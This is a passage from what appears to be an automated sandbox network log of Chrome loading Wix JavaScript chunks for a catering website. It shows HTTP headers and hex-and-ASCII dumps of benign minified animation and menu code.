                                                                                                                                                                                                                        Data Ascii: onst t=o(g.add,c),f=r(u,s({...g,offset:0},i,e),s({...g,offset:100},i,e),i,n);v=f.start+g.offset/100*(f.end-f.start)+t}else"number"==typeof a&&(v=l+a)}return d||a||(d=v-l),{...t,start:l,end:v,startRange:p,endRange:g,duration:d||a}}function u(t){return"stic
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 3d 69 3f 6f 3d 6e 3f 28 74 2d 65 29 2f 6e 3a 31 3a 74 3e 69 26 26 28 6f 3d 31 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 77 69 6e 64 6f 77 3f 65 3f 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3a 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3a 65 3f 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3a 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 29 7b 63 6f 6e 73 74 20 65 3d 6e 28 74 2c 64 29 2c 69 3d 65 2e 72 6f 6f 74 2c 6f 3d 65 2e 68 6f 72 69 7a 6f 6e 74 61 6c 2c 73 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65
                                                                                                                                                                                                                        Data Ascii: =i?o=n?(t-e)/n:1:t>i&&(o=1),o}function v(t,e){return t===window?e?window.document.documentElement.clientWidth:window.document.documentElement.clientHeight:e?t.clientWidth:t.clientHeight}function p(t){const e=n(t,d),i=e.root,o=e.horizontal,s=new WeakMap;le
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 5d 3d 6e 5b 69 5d 7d 29 29 2c 6e 7d 29 29 3b 67 2e 6c 65 6e 67 74 68 3d 30 2c 67 2e 70 75 73 68 28 2e 2e 2e 74 29 7d 29 2c 31 30 30 29 2c 69 3d 3d 3d 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 66 29 3a 77 69 6e 64 6f 77 2e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 26 26 28 68 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 66 29 2c 68 2e 6f 62 73 65 72 76 65 28 69 2c 7b 62 6f 78 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 7d 29 29 29 7d 72 65 74 75 72 6e 20 65 2e 6f 62 73 65 72 76 65 56 69 65 77 70 6f 72 74 45 6e 74 72 79 26 26 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 63 3d 6e 65 77 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                        Data Ascii: ]=n[i]})),n}));g.length=0,g.push(...t)}),100),i===window?window.addEventListener("resize",f):window.ResizeObserver&&(h=new window.ResizeObserver(f),h.observe(i,{box:"border-box"})))}return e.observeViewportEntry&&window.IntersectionObserver&&(c=new window
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 72 65 73 73 7c 7c 74 68 69 73 2e 72 65 73 65 74 50 72 6f 67 72 65 73 73 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 6d 65 61 73 75 72 65 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6d 65 61 73 75 72 65 7c 7c 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 72 6f 6f 74 3b 74 68 69 73 2e 70 72 6f 67 72 65 73 73 2e 70 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3f 74 2e 73 63 72 6f 6c 6c 58 7c 7c 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 7c 7c 30 3a 74 2e 73 63 72 6f 6c 6c 59 7c 7c 74 2e 73 63 72 6f 6c 6c 54 6f 70 7c 7c 30 7d 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 21 31 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 65 7c 7c 28 65 3d
                                                                                                                                                                                                                        Data Ascii: ress||this.resetProgress.bind(this),this._measure=this.config.measure||(()=>{const t=this.config.root;this.progress.p=this.config.horizontal?t.scrollX||t.scrollLeft||0:t.scrollY||t.scrollTop||0}),this._trigger=function(t){let e=!1;return function(){e||(e=
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 3d 65 2d 6f 3b 69 66 28 4d 61 74 68 2e 61 62 73 28 73 29 3c 6e 29 72 65 74 75 72 6e 20 65 7d 72 65 74 75 72 6e 20 6f 7d 28 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 67 72 65 73 73 2e 70 2c 74 68 69 73 2e 70 72 6f 67 72 65 73 73 2e 70 2c 2b 28 31 2d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 72 61 6e 73 69 74 69 6f 6e 46 72 69 63 74 69 6f 6e 29 2e 74 6f 46 69 78 65 64 28 33 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 74 72 61 6e 73 69 74 69 6f 6e 45 70 73 69 6c 6f 6e 29 7d 64 65 73 74 72 6f 79 28 29 7b 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 45 66 66 65 63 74 28 29 7d 73 65 74 75 70 45 76 65 6e 74 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 72 6f 6f 74 2e 61 64 64 45 76
                                                                                                                                                                                                                        Data Ascii: =e-o;if(Math.abs(s)<n)return e}return o}(this.currentProgress.p,this.progress.p,+(1-this.config.transitionFriction).toFixed(3),this.config.transitionEpsilon)}destroy(){this.pause(),this.removeEffect()}setupEvent(){this.removeEvent(),this.config.root.addEv
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 28 28 28 29 3d 3e 74 26 26 74 28 65 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 74 2e 72 65 63 74 2e 77 69 64 74 68 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 74 2e 72 65 63 74 2e 68 65 69 67 68 74 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 6c 65 74 20 65 2c 69 2c 6f 2c 73 2c 66 2c 68 3d 21 31 2c 61 3d 7b 78 3a 74 2e 72 65 63 74 2e 77 69 64 74 68 2f 32 2c 79 3a 74 2e 72 65 63 74 2e 68 65 69 67 68 74 2f 32 2c 76 78 3a 30 2c 76 79 3a 30 7d 3b 63 6f 6e 73 74 20 64 3d 7b 78 3a 30 2c 79 3a 30 7d 3b 72 65 74 75 72 6e 20 74 2e
                                                                                                                                                                                                                        Data Ascii: ((()=>t&&t(e)))}function u(t){t.rect.width=window.document.documentElement.clientWidth,t.rect.height=window.document.documentElement.clientHeight}function f(t){let e,i,o,s,f,h=!1,a={x:t.rect.width/2,y:t.rect.height/2,vx:0,vy:0};const d={x:0,y:0};return t.


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        112192.168.2.55005934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC627OUTGET /services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 689
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: LZEZkvFqeQEqoYjOXr7jwgQH_dKXeCpF
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 182313641 957957258
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 235557269
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273551
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:57 GMT
                                                                                                                                                                                                                        ETag: "a0ecc37aaddba206911fa5c067b2825b"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC229INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 32 36 35 5d 2c 7b 33 33 33 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 65 64 69 74 6f 72 50 61 67 65 3a 28 29 3d 3e 62 2c 70 61 67 65 3a 28 29 3d 3e 67 7d 29 3b 76 61 72 20 6e 3d 72 28 32 30 36 33 36 29 2c 6f 3d 72 28 37 37 37 34 38 29 3b 63 6f 6e 73 74 20 61 3d 5b 22 56 65 72 74 69 63 61 6c 4d 65 6e 75 22 5d 2c 70 3d 22 45 78 70 61
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7265],{33368:(e,t,r)=>{r.r(t),r.d(t,{editorPage:()=>b,page:()=>g});var n=r(20636),o=r(77748);const a=["VerticalMenu"],p="Expa
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC460INData Raw: 6e 64 61 62 6c 65 4d 65 6e 75 22 2c 6c 3d 22 44 72 6f 70 44 6f 77 6e 4d 65 6e 75 22 2c 73 3d 22 53 74 79 6c 61 62 6c 65 48 6f 72 69 7a 6f 6e 74 61 6c 4d 65 6e 75 22 3b 76 61 72 20 75 3d 72 28 37 31 30 38 35 29 3b 63 6f 6e 73 74 20 63 3d 28 65 2c 74 29 3d 3e 72 3d 3e 28 7b 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 73 3a 65 2c 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 4d 6f 75 6e 74 3a 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 72 2e 67 65 74 46 75 6c 6c 55 72 6c 57 69 74 68 6f 75 74 51 75 65 72 79 50 61 72 61 6d 73 28 29 3b 65 2e 75 70 64 61 74 65 50 72 6f 70 73 28 7b 5b 74 5d 3a 6e 7d 29 7d 7d 29 2c 69 3d 28 30 2c 6f 2e 4f 67 29 28 5b 75 2e 24 31 5d 2c 63 28 5b 2e 2e 2e 61 2c 73 5d 2c 22 63 75 72 72 65 6e 74 50 61 67 65 48 72 65 66 22 29 29 2c 5f 3d 28 30 2c 6f 2e 4f
                                                                                                                                                                                                                        Data Ascii: ndableMenu",l="DropDownMenu",s="StylableHorizontalMenu";var u=r(71085);const c=(e,t)=>r=>({componentTypes:e,componentWillMount:e=>{const n=r.getFullUrlWithoutQueryParams();e.updateProps({[t]:n})}}),i=(0,o.Og)([u.$1],c([...a,s],"currentPageHref")),_=(0,o.O


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        113192.168.2.55006034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC408OUTGET /services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1114INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 14156
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: iYVKGrzhoab_QbzIX0P.qkgeVDub6Mlj
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 420120200 789958834
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcydaHuKmePuYLvGovietlnc/MRAhrlVRxaXdYSRy7tLb
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273551
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:56 GMT
                                                                                                                                                                                                                        ETag: "2508cb0a2fdf98f9e0771e42fcc78a79"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC276INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 34 5d 2c 7b 38 31 32 32 30 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 51 66 3a 28 29 3d 3e 72 2c 53 37 3a 28 29 3d 3e 63 2c 54 5f 3a 28 29 3d 3e 6f 2c 74 6e 3a 28 29 3d 3e 73 2c 78 67 3a 28 29 3d 3e 6e 7d 29 3b 63 6f 6e 73 74 20 6e 3d 74 3d 3e 2d 28 4d 61 74 68 2e 63 6f 73 28 4d 61 74 68 2e 50 49 2a 74 29 2d 31 29 2f 32 2c 6f 3d 74 3d 3e 74 3c 2e 35 3f 32 2a 74 2a 2a 32 3a 31 2d 28 2d 32 2a 74 2b 32 29 2a 2a 32 2f 32 2c 73 3d 74 3d
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[974],{81220:(t,e,i)=>{i.d(e,{Qf:()=>r,S7:()=>c,T_:()=>o,tn:()=>s,xg:()=>n});const n=t=>-(Math.cos(Math.PI*t)-1)/2,o=t=>t<.5?2*t**2:1-(-2*t+2)**2/2,s=t=
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 34 2a 74 2a 2a 32 29 29 2f 32 3a 28 4d 61 74 68 2e 73 71 72 74 28 2d 28 32 2a 74 2d 33 29 2a 28 32 2a 74 2d 31 29 29 2b 31 29 2f 32 2c 72 3d 7b 6c 69 6e 65 61 72 3a 74 3d 3e 74 2c 73 69 6e 65 49 6e 3a 74 3d 3e 31 2d 4d 61 74 68 2e 63 6f 73 28 74 2a 4d 61 74 68 2e 50 49 2f 32 29 2c 73 69 6e 65 4f 75 74 3a 74 3d 3e 4d 61 74 68 2e 73 69 6e 28 74 2a 4d 61 74 68 2e 50 49 2f 32 29 2c 73 69 6e 65 49 6e 4f 75 74 3a 6e 2c 71 75 61 64 49 6e 3a 74 3d 3e 74 2a 2a 32 2c 71 75 61 64 4f 75 74 3a 74 3d 3e 31 2d 28 31 2d 74 29 2a 2a 32 2c 71 75 61 64 49 6e 4f 75 74 3a 6f 2c 63 75 62 69 63 49 6e 3a 74 3d 3e 74 2a 2a 33 2c 63 75 62 69 63 4f 75 74 3a 74 3d 3e 31 2d 28 31 2d 74 29 2a 2a 33 2c 63 75 62 69 63 49 6e 4f 75 74 3a 74 3d 3e 74 3c 2e 35 3f 34 2a 74 2a 2a 33 3a 31 2d
                                                                                                                                                                                                                        Data Ascii: 4*t**2))/2:(Math.sqrt(-(2*t-3)*(2*t-1))+1)/2,r={linear:t=>t,sineIn:t=>1-Math.cos(t*Math.PI/2),sineOut:t=>Math.sin(t*Math.PI/2),sineInOut:n,quadIn:t=>t**2,quadOut:t=>1-(1-t)**2,quadInOut:o,cubicIn:t=>t**3,cubicOut:t=>1-(1-t)**3,cubicInOut:t=>t<.5?4*t**3:1-
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 29 22 2c 71 75 61 72 74 49 6e 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 37 2c 20 30 2c 20 30 2e 31 37 35 2c 20 31 29 22 2c 71 75 69 6e 74 49 6e 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 35 35 2c 20 30 2e 30 35 2c 20 30 2e 38 35 35 2c 20 30 2e 30 36 29 22 2c 71 75 69 6e 74 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 33 2c 20 31 2c 20 30 2e 33 32 2c 20 31 29 22 2c 71 75 69 6e 74 49 6e 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 36 2c 20 30 2c 20 30 2e 30 37 2c 20 31 29 22 2c 65 78 70 6f 49 6e 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 39 35 2c 20 30 2e 30 35 2c 20 30 2e 37 39 35 2c 20 30 2e 30 33 35 29 22 2c 65 78 70 6f 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e
                                                                                                                                                                                                                        Data Ascii: )",quartInOut:"cubic-bezier(0.77, 0, 0.175, 1)",quintIn:"cubic-bezier(0.755, 0.05, 0.855, 0.06)",quintOut:"cubic-bezier(0.23, 1, 0.32, 1)",quintInOut:"cubic-bezier(0.86, 0, 0.07, 1)",expoIn:"cubic-bezier(0.95, 0.05, 0.795, 0.035)",expoOut:"cubic-bezier(0.
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 74 75 72 6e 20 6f 28 69 5b 31 5d 2c 65 29 2b 6f 28 69 5b 36 5d 2c 65 29 7d 28 74 2c 65 29 3a 70 61 72 73 65 49 6e 74 28 74 29 7c 7c 30 3a 30 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 69 29 7b 63 6f 6e 73 74 7b 6e 61 6d 65 3a 6e 2c 6f 66 66 73 65 74 3a 6f 3d 30 7d 3d 74 2c 7b 73 74 61 72 74 3a 73 2c 65 6e 64 3a 72 7d 3d 69 2c 63 3d 72 2d 73 2c 75 3d 6f 2f 31 30 30 3b 6c 65 74 20 66 2c 68 3b 72 65 74 75 72 6e 22 65 6e 74 72 79 22 3d 3d 3d 6e 3f 28 66 3d 73 2d 65 2c 68 3d 4d 61 74 68 2e 6d 69 6e 28 65 2c 63 29 29 3a 22 65 6e 74 72 79 2d 63 72 6f 73 73 69 6e 67 22 3d 3d 3d 6e 3f 28 66 3d 73 2d 65 2c 68 3d 63 29 3a 22 63 6f 6e 74 61 69 6e 22 3d 3d 3d 6e 3f 28 66 3d 4d 61 74 68 2e 6d 69 6e 28 72 2d 65 2c 73 29 2c 68 3d 4d 61 74 68 2e 61 62 73 28 65 2d
                                                                                                                                                                                                                        Data Ascii: eturn o(i[1],e)+o(i[6],e)}(t,e):parseInt(t)||0:0}function s(t,e,i){const{name:n,offset:o=0}=t,{start:s,end:r}=i,c=r-s,u=o/100;let f,h;return"entry"===n?(f=s-e,h=Math.min(e,c)):"entry-crossing"===n?(f=s-e,h=c):"contain"===n?(f=Math.min(r-e,s),h=Math.abs(e-
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 7b 2e 2e 2e 67 2c 6f 66 66 73 65 74 3a 31 30 30 7d 2c 69 2c 65 29 2c 69 2c 6e 29 3b 76 3d 66 2e 73 74 61 72 74 2b 67 2e 6f 66 66 73 65 74 2f 31 30 30 2a 28 66 2e 65 6e 64 2d 66 2e 73 74 61 72 74 29 2b 74 7d 65 6c 73 65 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 76 3d 6c 2b 61 29 7d 72 65 74 75 72 6e 20 64 7c 7c 61 7c 7c 28 64 3d 76 2d 6c 29 2c 7b 2e 2e 2e 74 2c 73 74 61 72 74 3a 6c 2c 65 6e 64 3a 76 2c 73 74 61 72 74 52 61 6e 67 65 3a 70 2c 65 6e 64 52 61 6e 67 65 3a 67 2c 64 75 72 61 74 69 6f 6e 3a 64 7c 7c 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 72 65 74 75 72 6e 22 73 74 69 63 6b 79 22 3d 3d 3d 74 2e 70 6f 73 69 74 69 6f 6e 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 2c 69 29 7b 69 26 26 28 74 2e 73 74 79 6c 65 2e 70 6f
                                                                                                                                                                                                                        Data Ascii: {...g,offset:100},i,e),i,n);v=f.start+g.offset/100*(f.end-f.start)+t}else"number"==typeof a&&(v=l+a)}return d||a||(d=v-l),{...t,start:l,end:v,startRange:p,endRange:g,duration:d||a}}function u(t){return"sticky"===t.position}function f(t,e,i){i&&(t.style.po
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 75 72 6e 20 74 3d 3d 3d 77 69 6e 64 6f 77 3f 65 3f 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3a 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 3a 65 3f 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 3a 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 29 7b 63 6f 6e 73 74 20 65 3d 6e 28 74 2c 64 29 2c 69 3d 65 2e 72 6f 6f 74 2c 6f 3d 65 2e 68 6f 72 69 7a 6f 6e 74 61 6c 2c 73 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 72 2c 63 2c 75 2c 66 2c 68 2c 70 3d 76 28 69 2c 6f 29 3b 63 6f 6e 73 74 20 67 3d 5b 5d 2c 77 3d 7b 76 69 65 77 70 6f 72 74 57 69 64 74 68 3a
                                                                                                                                                                                                                        Data Ascii: urn t===window?e?window.document.documentElement.clientWidth:window.document.documentElement.clientHeight:e?t.clientWidth:t.clientHeight}function p(t){const e=n(t,d),i=e.root,o=e.horizontal,s=new WeakMap;let r,c,u,f,h,p=v(i,o);const g=[],w={viewportWidth:
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 3d 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 66 29 3a 77 69 6e 64 6f 77 2e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 26 26 28 68 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 66 29 2c 68 2e 6f 62 73 65 72 76 65 28 69 2c 7b 62 6f 78 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 7d 29 29 29 7d 72 65 74 75 72 6e 20 65 2e 6f 62 73 65 72 76 65 56 69 65 77 70 6f 72 74 45 6e 74 72 79 26 26 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 26 26 28 63 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e
                                                                                                                                                                                                                        Data Ascii: =window?window.addEventListener("resize",f):window.ResizeObserver&&(h=new window.ResizeObserver(f),h.observe(i,{box:"border-box"})))}return e.observeViewportEntry&&window.IntersectionObserver&&(c=new window.IntersectionObserver((function(t){t.forEach((t=>
